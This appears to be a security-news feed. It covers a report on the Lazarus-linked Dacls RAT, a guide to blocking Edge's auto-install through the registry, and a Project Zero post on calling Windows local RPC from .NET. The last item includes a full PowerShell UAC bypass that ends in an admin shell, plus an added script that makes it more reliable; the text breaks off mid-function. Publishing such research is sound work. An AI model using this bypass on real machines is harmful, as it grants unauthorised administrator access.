While they are known for targeting both Windows [1, 2, 3] and macOS [1, 2] targets, this is the first time they are connected to malware capable of infecting and abusing Linux devices.

"At present, the industry has never disclosed the Lazarus Group's attack samples and cases against the Linux platform," the Qihoo 360 Netlab researchers state.

"And our analysis shows that this is a fully functional, covert and RAT program targeting both Windows and Linux platforms, and the samples share some key characters being used by Lazarus Group."

The researchers linked the newly discovered dual-platform RAT to the Lazarus Group hackers based on the thevagabondsatchel[.]com download server the APT group also employed in past campaigns, as shown by open source threat intelligence data [1, 2] and malware analysis reports [1, 2].

Dacls connections to Lazarus Group
Modular and cross-platform RAT
The malware is modular and it is capable of dynamically loading plug-ins remotely on compromised Windows servers, while the Linux version bundles all the plug-ins it needs to function within the bot component.

Dacls uses TLS and RC4 double-layer encryption to secure its command and control (C2) communication channels, encrypts its configuration file using AES, and can also dynamically update its C2 instructions.

Researchers discovered both Windows and Linux Dacls malware samples on an opendir download server, together with an exploit payload for Atlassian Confluence Server installations vulnerable to attacks against the CVE-2019-3396 RCE bug.

This hints at the Lazarus Group hacking outfit potentially using the CVE-2019-3396 vulnerability to spread Dacls malware payloads on unpatched Confluence servers.

Malware samples found on the download server

Reverse P2P plug-in used to hide Lazarus infrastructure
Dacls' plug-ins provide it with a large array of features, including but not limited to receiving and executing C2 commands, file management and downloading additional data from the C2 server, process management, random network scans on port 8291, and network connectivity testing.

"We are not sure why TCP 8291 is targeted, but we know that the Winbox protocol of the MikroTik Router device works on TCP / 8291 port and is exposed on the Internet," the report says.

The RAT also features a reverse P2P plug-in that acts as a C2 Connection Proxy that routes traffic between bots and the C2 server to avoid direct connections to operators' infrastructure.

"This is a commonly used technique by the Lazarus Group. With connection proxy, the number of target host connections can be reduced, and the communication between the target and the real C2 can be hidden," the researchers explain.

"In some cases, an infected intranet host can be used to further penetrates into the isolated network segment."

The Qihoo 360 Netlab research team recommends that Confluence users patch their systems as soon as possible to avoid having their servers compromised in attacks attempting to infect them with this RAT.

They also provide a list of indicators of compromise (IOCs) related to the malware strain at the end of their Dacls report.


How to Block Windows 10 Update Force Installing the New Edge Browser
20.12.2019
Bleepingcomputer  OS

Microsoft has stated that when the new Microsoft Edge reaches general availability in January, the browser will automatically be installed on Windows 10 devices via Windows Update.

On January 15th, 2020, Microsoft plans on officially releasing the new Microsoft Edge browser and has decided to push it out via Windows Update rather than having it be a manual download.

When the new browser is installed, it will replace the existing Microsoft Edge browser on the device, which for many is a good thing as it will provide far greater compatibility with web sites and increased performance.

Organizations that use web sites built for Microsoft Edge's EdgeHTML rendering engine, however, may not want this forced installation.

To accommodate these enterprise users, Microsoft has released a support document and a tool called the Microsoft Edge Blocker Toolkit that can be used to create a Registry value that blocks the automatic delivery of the new Microsoft Edge.

"To help our customers become more secure and up-to-date, Microsoft will distribute Microsoft Edge (Chromium-based) through Automatic Updates for Windows 10 RS4 and newer. The Blocker Toolkit is intended for organizations that would like to block automatic delivery of Microsoft Edge (Chromium-based) to machines in environments where Automatic Updates is enabled. The Blocker Toolkit will not expire."

Microsoft states that this Registry value is only available on Windows 10 RS4 (version 1803) or newer and only blocks installs of Microsoft Edge using Windows Update.

• For computers running Windows 10 RS4 and newer, the Blocker Toolkit prevents the machine from receiving Microsoft Edge (Chromium-based) via Automatic Updates.
• The Blocker Toolkit will not prevent users from manually installing Microsoft Edge (Chromium-based) from internet download, or from external media.
• Organizations do not need to deploy the Blocker Toolkit in environments managed with an update management solution such as Windows Server Update Services or System Center Configuration Manager. Organizations can use those products to fully manage deployment of updates released through Windows Update and Microsoft Update, including Microsoft Edge (Chromium-based), within their environment.
The Blocker Toolkit includes HTML instructions, a CMD script, and Group Policy templates that can be used to control the automatic delivery of the new Microsoft Edge browser, which we will discuss in the next section.

Blocking Edge from being installed by Windows Update
Microsoft has added a new Registry value to Windows 10 that blocks the automatic install of the new Microsoft Edge.

This new value needs to be created under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate key and is called DoNotUpdateToEdgeWithChromium.

If this value is set to 1, the Edge install via Windows Update will be blocked; if it is set to 0 or missing, Edge will be installed automatically.

Below we have provided three methods that users can use to create this Registry value on a Windows device.

Method 1: Directly modify the Registry
For users who are comfortable modifying the Windows Registry, the easiest method is to create the DoNotUpdateToEdgeWithChromium Registry value manually or through the registry file shown below.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate]
"DoNotUpdateToEdgeWithChromium"=dword:00000001

To use a Registry file to make the change, simply follow these steps:

Open Notepad and copy and paste the contents of the above Registry file into the Notepad.
Save the file as BlockAutoEdge.reg on your Windows Desktop.
Double-click on the file and let Windows merge the data.
This will cause the DoNotUpdateToEdgeWithChromium Registry value to automatically be created and set to 1 as shown below.

DoNotUpdateToEdgeWithChromium Registry value created

If you do not feel comfortable creating the above Registry file, you can download it from here.
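An added example (not Microsoft's or BleepingComputer's code) that parses the .reg file shown above and applies the rule stated earlier (DWORD 1 blocks, 0 or missing allows), so a file can be validated before it is merged or pushed to many machines; it assumes the Registry Editor 5.00 export format and decodes only dword and string values.

```python
import re
from typing import Dict, Optional, Tuple

EDGE_UPDATE_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate"
BLOCK_VALUE = "DoNotUpdateToEdgeWithChromium"

# The .reg file from the article, embedded so the example runs stand-alone.
BLOCK_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EdgeUpdate]
"DoNotUpdateToEdgeWithChromium"=dword:00000001
"""

# {key path: {value name: (type, data)}}
RegTree = Dict[str, Dict[str, Tuple[str, object]]]
_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg(text: str) -> RegTree:
    """Parse a Registry Editor 5.00 export. Only REG_DWORD ("dword:<8 hex>")
    and REG_SZ ("...") are decoded; anything else is kept as ("raw", text).
    A value line of the form "Name"=- deletes that value, as regedit does."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "Windows Registry Editor Version 5.00":
        raise ValueError("missing 'Windows Registry Editor Version 5.00' header")
    tree: RegTree = {}
    current: Optional[str] = None
    for raw in lines[1:]:
        line = raw.strip()
        if not line or line.startswith(";"):  # blank lines and comments
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            tree.setdefault(current, {})
            continue
        if current is None:
            raise ValueError(f"value line before any [key]: {line}")
        m = _VALUE_LINE.match(line)
        if m is None:
            raise ValueError(f"unparseable line: {line}")
        name, rhs = m.group(1), m.group(2).strip()
        if rhs.startswith("dword:"):
            tree[current][name] = ("REG_DWORD", int(rhs[len("dword:"):], 16))
        elif len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            # .reg strings escape backslashes as \\ ; undo that
            tree[current][name] = ("REG_SZ", rhs[1:-1].replace("\\\\", "\\"))
        elif rhs == "-":
            tree[current].pop(name, None)
        else:
            tree[current][name] = ("raw", rhs)
    return tree


def _lookup(tree: RegTree, key: str, value: str):
    """Case-insensitive lookup, since the registry ignores case in both."""
    for k, values in tree.items():
        if k.lower() == key.lower():
            for name, entry in values.items():
                if name.lower() == value.lower():
                    return entry
    return None


def edge_auto_install_blocked(reg_text: str) -> bool:
    """Apply the rule from the article: DWORD 1 blocks the Windows Update
    delivery of Edge; 0, a missing value, or a wrong value type (for example
    the string "1" instead of a dword) leaves the automatic install enabled."""
    entry = _lookup(parse_reg(reg_text), EDGE_UPDATE_KEY, BLOCK_VALUE)
    return entry == ("REG_DWORD", 1)


if __name__ == "__main__":
    print("blocked:", edge_auto_install_blocked(BLOCK_REG))  # blocked: True
```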

Method 2: Use the Microsoft Edge Blocker Toolkit
Microsoft has released the Microsoft Edge Blocker Toolkit, which automates the creation of the Registry value on a local or remote computer.

To use the tool, simply download the program and execute it to extract the enclosed files to a folder. The extracted files will consist of a Group Policy template, HTML instructions, and a CMD script called EdgeChromium_Blocker.cmd.

To use EdgeChromium_Blocker.cmd, open an elevated command prompt, cd into the directory where you extracted the files, and then execute the EdgeChromium_Blocker.cmd script to see the help screen shown below.

MICROSOFT TOOL KIT TO DISABLE DELIVERY OF
MICROSOFT EDGE (CHROMIUM-BASED)

Copyright (C) Microsoft Corporation. All rights reserved.

This tool can be used to remotely block or unblock the delivery of
Microsoft Edge (Chromium-based) via Automatic Updates.

------------------------------------------------------------
Usage:
EdgeChromium_Blocker.cmd [machine name] [/B] [/U] [/H]
B = Block Microsoft Edge (Chromium-based) deployment
U = Allow Microsoft Edge (Chromium-based) deployment
H = Help

To block or unblock installation on the local machine use
period ("." with no quotes) as the machine name

Examples:
EdgeChromium_Blocker.cmd mymachine /B (blocks delivery on machine "mymachine")

EdgeChromium_Blocker.cmd /U (unblocks delivery on the local machine)
------------------------------------------------------------
To block the automatic installation of Microsoft Edge, you would execute the "EdgeChromium_Blocker.cmd /B" command.

To unblock the installation of Microsoft Edge, you would execute the "EdgeChromium_Blocker.cmd /U" command.

Method 3: Use the Edge Group Policy templates
The final method that can be used to block the automatic installation of the Chromium-based Microsoft Edge is to download the Microsoft Edge Blocker Toolkit and install it.

After extracting the files, copy the EdgeChromium_Blocker.admx file to the C:\Windows\PolicyDefinitions folder and the EdgeChromium_Blocker.adml language file to the C:\Windows\PolicyDefinitions\en-US folder. (The ADMX template goes in the root PolicyDefinitions folder; the ADML file goes in the language subfolder, otherwise the Group Policy Editor will not load the template.)

You can now open the Group Policy Editor and a new policy called "Do not allow delivery of Microsoft Edge (Chromium-based) through Automatic Updates" will be available under the following folder:

/Computer Configuration
/Administrative Templates
/Windows Components
/Windows Update
/Microsoft Edge (Chromium-based) Blockers
This new policy can be seen in the policy editor below.

New Microsoft Edge policy

When enabled, the Group Policy Editor will automatically add the DoNotUpdateToEdgeWithChromium value to the Registry.
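All three methods above end up writing the same DoNotUpdateToEdgeWithChromium DWORD under HKLM\SOFTWARE\Microsoft\EdgeUpdate. The script below is an added example for administrators who would rather audit and set that value from PowerShell (for instance as part of a build script); it is not from the article or from Microsoft's toolkit. It assumes an elevated session, and it treats "unblock" as setting the value to 0, which has the same effect as the value being absent (whether the toolkit's /U switch deletes the value or zeroes it is not stated on the page).

```powershell
# Added example (not from the article or Microsoft's toolkit): audit and set the
# Edge Chromium auto-delivery block from an elevated PowerShell session.

$EdgeUpdateKey = 'HKLM:\SOFTWARE\Microsoft\EdgeUpdate'
$BlockValue    = 'DoNotUpdateToEdgeWithChromium'

function Get-EdgeChromiumBlockState {
    # Returns 'Blocked' (value is 1), 'Allowed' (value present but not 1)
    # or 'NotConfigured' (key or value missing).
    $item = Get-ItemProperty -Path $EdgeUpdateKey -Name $BlockValue -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'NotConfigured' }
    if ($item.$BlockValue -eq 1) { return 'Blocked' }
    return 'Allowed'
}

function Set-EdgeChromiumBlockState {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Block', 'Unblock')]
        [string]$Action
    )

    if (-not (Test-Path $EdgeUpdateKey)) {
        # The EdgeUpdate key does not exist on machines where Edge Update has never run,
        # so create it first (the .reg file does this implicitly on merge).
        if ($PSCmdlet.ShouldProcess($EdgeUpdateKey, 'Create registry key')) {
            New-Item -Path $EdgeUpdateKey -Force | Out-Null
        }
    }

    # Assumption: 0 is used for "unblock"; absent and 0 behave the same way.
    $desired = if ($Action -eq 'Block') { 1 } else { 0 }
    if ($PSCmdlet.ShouldProcess("$EdgeUpdateKey\$BlockValue", "Set DWORD to $desired")) {
        # -Force overwrites an existing value and also corrects a wrong value type
        # (e.g. a REG_SZ "1" left behind by a hand edit, which the updater ignores).
        New-ItemProperty -Path $EdgeUpdateKey -Name $BlockValue `
            -PropertyType DWord -Value $desired -Force | Out-Null
    }

    # Read the value back so the caller sees the effective state, not the intent.
    Get-EdgeChromiumBlockState
}

# Usage:
#   Get-EdgeChromiumBlockState
#   Set-EdgeChromiumBlockState -Action Block    # same result as merging BlockAutoEdge.reg
#   Set-EdgeChromiumBlockState -Action Unblock
#   Set-EdgeChromiumBlockState -Action Block -WhatIf   # show what would change
```

Reading the value back after writing it is the useful part: a REG_SZ "1" created by hand looks right in regedit but is not the DWORD the updater checks, and the audit function reports that as 'Allowed'.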


Calling Local Windows RPC Servers from .NET
19.12.19  Exploit blog  Project Zero

As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting. This blog post gives an overview of using some recent tooling I’ve released as part of my sandbox analysis project to access Local RPC servers on Windows from .NET. I’ll provide a worked example of using the tooling from PowerShell to exploit a novel and previously undocumented UAC bypass.

I’m not going to go into much detail about the challenges and decisions I faced implementing my tooling, for that I would recommend my presentation on this topic that I made at the HITB Abu Dhabi and the Power of Community 2019 conferences. Slides are here, hopefully a video will be made available by one or other of the conferences at a future date.
Background
If you go through many of my recent security reports in the issue tracker you’ll notice that I almost exclusively write my proof-of-concepts (POCs) in C#. I’m proficient in C++ but I find that C# just gives me the edge when writing programs to exploit complex logical flaws in the OS. To that end I consolidate a lot of my OS research into improving my NtApiDotNet library, which for my POCs can be trivially referenced from NuGet. I see writing proof-of-concepts in C# as having many advantages in terms of reliability, reducing effort and by offloading to an external library it simplifies the code to what’s important for the vendor to make an assessment.

Not everything can be written in C# (or .NET generally) and one of my big blind spots was anything which directly interacted with a Local RPC server. The primary reason for this blind spot is the tooling provided by Microsoft to generate clients only emits C code. I can’t write up an Interface Definition Language (IDL) file and generate a C# client directly.

Sometimes I get lucky and Microsoft provides a DLL on the system which directly exposes the API. For example when I was researching the Data Sharing Service I discovered that the OS also shipped the DSCLIENT DLL which mapped calls one to one with the RPC service. I could then use P/Invoke to call the DLL directly, at least once I’d figured out the undocumented API. The problem with this approach is it doesn’t scale. There’s no requirement for Microsoft to have made available a general purpose DLL to access the service; in fact the majority of RPC clients will be embedded directly in the executables which interact with the service.

You could compile the generated C code into your own DLL and call that from .NET (or use the mixed-mode C++/CLI) but I wanted a pure managed code solution. Also after much investigation I came to the conclusion that calling the OS RPC runtime (RPCRT4.DLL) which implements the underlying client code via P/Invoke was going to be complex, and error prone. Writing my own implementation seemed to be the best option.

There would be a number of advantages to a pure managed .NET implementation of a Local RPC client. For example you could eliminate almost all direct calls to native code (except to the low-level kernel calls). This makes fuzzing a server safer than using a C client, because the worst thing to happen would be generating an exception which could be caught if an invalid value is passed to the client. Also, as the .NET compiler generates significant metadata into compiled assemblies, you can use reflection to extract information about methods and structures at runtime. You could use this metadata to generate the fuzzed data.
Has it Been Done Before?
Before jumping into such a complex project as writing my own Local RPC client I asked, has someone already developed a .NET based RPC client before? Even asking that isn’t a simple question as there are really two parts I needed to write:
Tool to extract the information from existing RPC servers to generate a client.
A Local RPC client implementation.
Here’s some of the tooling and libraries that I investigated during the process but ultimately rejected, however they’re still useful in their own right:
RPC View
This is a screenshot of RPC View. The tool has four sections. The upper left section shows the endpoints, the upper right shows the processes currently running, the lower left shows the interfaces by PID and UUID and the bottom right shows procedures, with indexes and addresses.

RPC View is an amazing tool to inspect what RPC servers are currently running. It’s all driven through a GUI (as shown above), you can select a process or an RPC endpoint and inspect what functions are available. Once you’ve found an RPC server of interest you can then use the tool’s inbuilt decompiler to generate an IDL file which can be recompiled with the existing Microsoft tooling. This would get me close to the first requirement, extracting RPC server information, although we’d still need to get from an IDL file to a .NET client.

RPC View was originally closed source, but in 2017 was opened up and put on Github. However, it’s all written in C/C++ so couldn’t be easily used in a .NET application and the IDL generation is incomplete (such as missing support for system handles and some structure types) and not ideal for our purposes as parsing a text format would be more complicated.
RPCForge
This picture is the title slide of the presentation of ALPC-RPC. The text reads "ALPC-RPC", Clément Rouault & Thomas Imbert, PacSec, November 2017".

The RPCForge project was developed by Clément Rouault and Thomas Imbert as part of their presentation at PacSec on Local RPC. The presentation is a great resource if you want to understand how Local RPC uses an in-built undocumented kernel feature called Advanced Local Procedure Calls (ALPC), and provides useful information on building your own Local RPC client using ALPC. The RPCForge project is a fuzzer for RPC client interfaces, it relies on a separate project PythonForWindows for the Local RPC implementation.

A cursory glance at the code should make one issue self-evident: it’s written in Python, which doesn’t really help in my goals of a .NET managed client. I could attempt to use IronPython (a .NET implementation of Python 2.7) to run the code, but that adds massive additional complexity for little benefit. It might be possible to write a code converter but that would take more effort than just writing a new implementation. Also the tooling to generate clients from existing RPC servers was never released (it was based on RPC View), making the existing code even less useful other than as a reference.
SMBLibrary
The final tool I’ll mention is the SMBLibrary project. This is an underappreciated .NET library which implements the Server Message Block (SMB) protocol, versions 1 through 3. As part of the library a simple Named Pipe-based RPC client has been implemented.

The library is written in C# and so would be directly useful for my purposes. Unfortunately the RPC client implementation is very basic, only supporting the bare minimum of functionality needed for a few common RPC servers. The protocol used for Local RPC is not the same as that used for Named Pipes requiring a new implementation to be developed. The project also doesn’t contain any tooling to generate clients.

If you ever need to do security testing against SMB servers and you want to use a .NET language I’d highly recommend using this library. However, for our purposes it doesn’t meet the bar.
The Implementation
The implementation I developed is all available in the Sandbox Analysis Tools Github repository. The implementation contains classes to load DLLs/EXEs and extract RPC server information to a .NET object. It also contains classes to marshal data using the Network Data Representation (NDR) protocol as well as the Local RPC client code. Finally I implemented a client generator which takes in the parsed RPC server information and generates a C# source code file.

The simplest way of accessing these features is to install my NtObjectManager PowerShell module which exposes various commands to extract RPC server information as well as generating and connecting the RPC client. I’ll demonstrate these commands through a worked example.
Worked Example - UAC Bypass
As a worked example I wanted to pick a bug which can only be accessed by directly calling an RPC service. It’d also be useful if it was currently unpatched as that allows it to be easily demonstrated on a stock installation of Windows. Of course I can’t detail a real unpatched security vulnerability. However I can publish details if it’s not an issue that Microsoft consider a security boundary, as they would not commit to fixing the issue in a security bulletin and there already exist unpatched public UAC bypasses which provide similar capabilities.

The full implementation of UAC, an RPC server exposed by the APPINFO service, is hidden from users through the ShellExecute APIs which means if the bug is in the service interface there’s no other way of exploiting it without directly calling the RPC server. It’s worth noting that Clément and Thomas’s talk at PacSec also presented a UAC bypass due to handling of the command line parsing. What I’m going to detail here is a different bug entirely.
Overview
The RPC server in APPINFO has the Interface ID of 201ef99a-7fa0-444c-9399-19ba84f12a1a and version 1.0. The main RPC function you call in the server is RAiLaunchAdminProcess as shown below (unimportant details omitted):

struct APP_PROCESS_INFORMATION {
unsigned __int3264 ProcessHandle;
unsigned __int3264 ThreadHandle;
long ProcessId;
long ThreadId;
};

long RAiLaunchAdminProcess(
handle_t hBinding,
[in][unique][string] wchar_t* ExecutablePath,
[in][unique][string] wchar_t* CommandLine,
[in] long StartFlags,
[in] long CreateFlags,
[in][string] wchar_t* CurrentDirectory,
[in][string] wchar_t* WindowStation,
[in] struct APP_STARTUP_INFO* StartupInfo,
[in] unsigned __int3264 hWnd,
[in] long Timeout,
[out] struct APP_PROCESS_INFORMATION* ProcessInformation,
[out] long *ElevationType
);

The majority of the parameters for this function are similar to the CreateProcessAsUser API which is used by the service to start the new UAC process. The most interesting parameter is CreateFlags. This flag parameter is directly mapped to the dwCreateFlags parameter for CreateProcessAsUser. Other than verifying the caller passed CREATE_UNICODE_ENVIRONMENT, all other flags are passed as is to the API. Are there any interesting flags? Yes, DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS automatically enable debugging on the new UAC process.

If you read my previous blog post on abusing the user-mode debugger you might see where this is going. If we can enable debugging on an elevated UAC process and get a handle to its debug object we can request the first debug event which will return a full access handle to the process. This trick works even if we wouldn’t normally be able to open the process directly for that level of access. We’d still need to get access to a handle to the debug object. To get a handle there’s a NtQueryInformationProcess information class you can request (ProcessDebugObjectHandle) once you’ve got a handle to an elevated process.

Unfortunately there’s a problem, accessing the debug object handle for a process requires having the PROCESS_QUERY_INFORMATION access right on the process handle. Due to security limits we’ll only get PROCESS_QUERY_LIMITED_INFORMATION access for the elevated process handle returned in the APP_PROCESS_INFORMATION::ProcessHandle structure field. This means we can’t just create an elevated process and open the debug object.

What can we do to still exploit it? The important thing to note is the debug object is created automatically inside the CreateProcessAsUser API by calling the following function exported by NTDLL.

NTSTATUS DbgUiConnectToDbg() {
PTEB teb = NtCurrentTeb();
if (teb->DbgSsReserved[1])
return STATUS_SUCCESS;

OBJECT_ATTRIBUTES ObjAttr{ sizeof(OBJECT_ATTRIBUTES) };
return ZwCreateDebugObject(&teb->DbgSsReserved[1], DEBUG_ALL_ACCESS,
&ObjAttr, DEBUG_KILL_ON_CLOSE);
}

The handle to the debug object is stored inside a reserved field of the TEB. This makes sense, as the CreateProcessAsUser and the WaitForDebugEvent APIs do not allow the caller to specify an explicit debug object handle. Instead waiting for debug events must occur only on the same thread that created the process. The result is all processes created on the same thread with a debugging flag share the same debug object.

Going back to the RAiLaunchAdminProcess method the StartFlags parameter is not passed to the CreateProcessAsUser API, instead it’s used to modify the behavior of the RPC method. It takes a number of different bit flags. The most important flag is in bit 0, if the bit is set the new process will be elevated otherwise the process will not be elevated. Crucially, if the process isn’t elevated we would have enough access to open a handle to the process’ debug object, which could be shared with a subsequent elevated process. To exploit this issue we can follow these steps:

1. Create a new non-elevated process through RAiLaunchAdminProcess with StartFlags set to 0 and the DEBUG_PROCESS create flag set. This will initialize the debug object field in the TEB of the RPC thread in the server and assign it to the new process.
2. Open a handle to the debug object using NtQueryInformationProcess with the returned process handle.
3. Detach the debugger and terminate the new process as it’s no longer needed.
4. Create a new elevated process through RAiLaunchAdminProcess with StartFlags set to 1 and the DEBUG_PROCESS create flag set. As the debug object field in the TEB is already initialized the existing object captured in step 2 is assigned to the new process.
5. Retrieve the initial debug event which will return a full access process handle.
6. With the new process handle code can be injected into the elevated process completing the UAC bypass.

There are a few things to note about this exploit. Firstly, there’s no guarantee that the same thread will be used for each call to RAiLaunchAdminProcess. The RPC server code uses a thread pool and could dispatch the call on a different thread; this means the debug object created in step 1 might not be the same as the one assigned in step 4. You can mitigate this somewhat by repeating step 1 multiple times to try to initialize a debug object for all pool threads, capturing a handle to each one. You could then be reasonably confident the process created in step 4 will share one of the captured debug objects.

Secondly, you’ll still get the UAC prompt when elevating the process in step 4; however the default settings for Windows allow select Windows binaries to be automatically elevated without a prompt. In a default installation you could spawn one of these Windows binaries, such as the Task Manager, and not see a prompt. As the bug we’re exploiting is in the service, not in the process we’re creating, we’re free to pick any executable we like.

I should point out that the pattern of behavior where a process can be created in a debugged state is repeated in other APIs. For example the WMI Win32_Process class’ Create method takes a Win32_ProcessStartup object where you can specify these same debug process flags. However, I couldn’t see a way of exploiting this behavior, but maybe someone else can?
Using PowerShell to Exploit
Finally we get to using my tools to exploit this UAC Bypass. We’ll use the NtObjectManager PowerShell module as that’d be the quickest approach, but you could do it only with C# if you wanted to. For each step I’ll outline the code you’ll want to run inside the PowerShell command shell.

Step 1: Install the NtObjectManager module from the PowerShell gallery for the current user. You’ll also need to set the PowerShell execution policy to allow for unsigned scripts to run. Note if you already have NtObjectManager installed and you want to ensure you have the latest version run the Update-Module command instead.

Install-Module "NtObjectManager" -Scope CurrentUser

Step 2: Parse the APPINFO.DLL service executable to extract all RPC servers from the DLL then filter everything but the RPC server we’re interested in based on the Interface ID. Optionally you can add the -DbgHelpPath parameter to Get-RpcServer to point to a copy of DBGHELP.DLL from Debugging Tools for Windows to resolve method names using public symbols. In this case we’ll use an alternative approach in step 3 to ensure the function has the correct name.

$rpc = Get-RpcServer "c:\windows\system32\appinfo.dll" `
| Select-RpcServer -InterfaceId "201ef99a-7fa0-444c-9399-19ba84f12a1a"

Step 3: Rename some specific parts of the RPC server interface. The parsed RPC server objects have mutable name strings for method names, parameters, structure fields etc. While it’s not necessary to do this step it makes the rest of the code easier to follow. The names can be assigned manually or you can use an XML file with the name information. You can generate a full XML file for a server using Get-RpcServerName function then edit it. The following is a simple example XML file which will rename the select parts:

<RpcServerNameData
xmlns="http://schemas.datacontract.org/2004/07/NtObjectManager">
<InterfaceId>201ef99a-7fa0-444c-9399-19ba84f12a1a</InterfaceId>
<InterfaceMajorVersion>1</InterfaceMajorVersion>
<InterfaceMinorVersion>0</InterfaceMinorVersion>
<Procedures>
<NdrProcedureNameData>
<Index>0</Index>
<Name>RAiLaunchAdminProcess</Name>
<Parameters>
<NdrProcedureParameterNameData>
<Index>10</Index>
<Name>ProcessInformation</Name>
</NdrProcedureParameterNameData>
</Parameters>
</NdrProcedureNameData>
</Procedures>
<Structures>
<NdrStructureNameData>
<Index>0</Index>
<Members/>
<Name>APP_STARTUP_INFO</Name>
</NdrStructureNameData>
<NdrStructureNameData>
<Index>2</Index>
<Members>
<NdrStructureMemberNameData>
<Index>0</Index>
<Name>ProcessHandle</Name>
</NdrStructureMemberNameData>
</Members>
<Name>APP_PROCESS_INFORMATION</Name>
</NdrStructureNameData>
</Structures>
</RpcServerNameData>

If you save the file to names.xml then you can apply it to the RPC server object using the following code:

Get-Content "names.xml" | Set-RpcServerName $rpc

Step 4: Create a client object based on the RPC server. This does a few things under the hood: it generates a C# source code file which implements the RPC client, then compiles that C# file into a temporary assembly, and finally it’ll create a new instance of the client object. The RPC client isn’t connected at the moment, it just implements the exposed functions and the code to marshal parameters. If you want to inspect the generated C# code you can also use the Format-RpcClient function.

$client = Get-RpcClient $rpc

Step 5: Connect the client to the Local RPC server ALPC port. As the UAC RPC server uses the RPC Endpoint Mapper we don’t need to know the name of the ALPC port, it can be automatically looked up. Usefully this process will also auto-start system services if the service has been registered with a specific start trigger, which is the case for the APPINFO service.

Connect-RpcClient $client

Step 6: Define a PowerShell function to wrap the call to the RAiLaunchAdminProcess method. This will make it easier to call, especially when we need to do it multiple times. We’ll pass the DEBUG_PROCESS flag to process creation but make it optional whether to elevate the process or not. The function will return a NtProcess object which can be used to access the properties of the created process including the debug object. Note that when calling RAiLaunchAdminProcess the outbound parameters such as ProcessInformation have been converted to a return structure. This is a convenience for PowerShell use and can be disabled if you really want to use out and ref parameters.

function Start-Uac {
    Param(
        [Parameter(Mandatory, Position = 0)]
        [string]$Executable,
        [switch]$RunAsAdmin
    )

    # DEBUG_PROCESS attaches the new process to the debug object of the
    # server thread; CREATE_UNICODE_ENVIRONMENT is the one flag the service checks for.
    $CreateFlags = [NtApiDotNet.Win32.CreateProcessFlags]::DebugProcess -bor `
        [NtApiDotNet.Win32.CreateProcessFlags]::UnicodeEnvironment
    $StartInfo = $client.New.APP_STARTUP_INFO()

    # StartFlags bit 0 selects elevation: 1 elevates, 0 creates a normal process.
    # hWnd is 0 and Timeout is -1 (infinite).
    $result = $client.RAiLaunchAdminProcess($Executable, $Executable,`
        [int]$RunAsAdmin.IsPresent, [int]$CreateFlags,`
        "C:\", "WinSta0\Default", $StartInfo, 0, -1)
    if ($result.retval -ne 0) {
        # retval is a Win32 error code, so wrap it to get a readable message.
        $ex = [System.ComponentModel.Win32Exception]::new($result.retval)
        throw $ex
    }

    # Wrap the returned process handle in an NtProcess object which owns the handle.
    $h = $result.ProcessInformation.ProcessHandle.Value
    Get-NtObjectFromHandle $h -OwnsHandle
}

Step 7: Create a non-elevated process and capture the debug object. It doesn’t matter what process we create here, notepad is as good as any. Once we’ve got the debug object we need to detach the process from the debugger otherwise we’ll get mixed messages from this and the elevated process when we wait for debug events. Also without detaching the process will not actually terminate.

$p = Start-Uac "c:\windows\system32\notepad.exe"
$dbg = Get-NtDebug -Process $p
Stop-NtProcess $p
Remove-NtDebugProcess $dbg -Process $p

Step 8: Create an elevated process, in this case an auto-elevated application such as the Task Manager. We’ll find the debug object assigned to the elevated process is the same as the one we captured in step 7, unless we’re unlucky and another thread serviced the RPC request; we’ll ignore that for now. At this point we issue a wait on the debug object to get the initial process creation debug event, from which we can extract the privileged process handle. Note that the handle returned in the initial debug event isn’t fully privileged: it’s missing PROCESS_SUSPEND_RESUME, which prevents us from being able to detach the process from the debug object. However we do have PROCESS_DUP_HANDLE access, so we can get a fully privileged handle by duplicating the current process pseudo-handle (-1) out of the elevated process using Copy-NtObject.

$p = Start-Uac "c:\windows\system32\taskmgr.exe" -RunAsAdmin
$ev = Start-NtDebugWait -Seconds 0 -DebugObject $dbg
$h = [IntPtr]-1
$new_p = Copy-NtObject -SourceProcess $ev.Process -SourceHandle $h
Remove-NtDebugProcess $dbg -Process $new_p

Step 9: The $new_p variable should now contain a fully privileged process handle. One quick way to get arbitrary privileged code executing is to use the handle as the parent process for a new process. For example the following will spawn a command prompt as admin.

New-Win32Process "cmd.exe" -ParentProcess $new_p -CreationFlags NewConsole
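The thread-pool caveat from the Overview (the elevated call may be serviced by a different APPINFO pool thread, and therefore a different debug object, than the one captured in step 7) can be handled the way that section suggests: prime several server threads with non-elevated launches, keep every debug object you get, then wait on each one for the elevated process's initial event. The script below is an added example and is not code from the Project Zero post or from the NtObjectManager module. It reuses the Start-Uac function and the cmdlets from steps 6 to 9 and assumes that $client is already connected, that Start-NtDebugWait either returns $null or throws when no event arrives before its timeout, that any event still queued after step 7's detaches belongs to the elevated process, and that eight priming launches is enough to cover the pool (that number is a guess).

```powershell
# Added example: steps 7 and 8 with the thread-pool race handled by priming
# several server threads. Assumes $client is connected (steps 1 to 5) and that
# Start-Uac from step 6 is defined in the current session.

function Get-UacDebugObjects {
    # Launch several non-elevated debugged helpers and keep the debug object that
    # the APPINFO thread servicing each call attached to the new process.
    param([int]$Attempts = 8)   # guessed pool size; raise it if the wait below fails
    $objects = @()
    for ($i = 0; $i -lt $Attempts; $i++) {
        $p   = Start-Uac "c:\windows\system32\notepad.exe"
        $dbg = Get-NtDebug -Process $p
        Stop-NtProcess $p
        # Detach so the helper really terminates and leaves no events behind.
        Remove-NtDebugProcess $dbg -Process $p
        $objects += $dbg
    }
    $objects
}

function Get-ElevatedProcessHandle {
    param(
        [Parameter(Mandatory)]$DebugObjects,
        [string]$Executable = "c:\windows\system32\taskmgr.exe"
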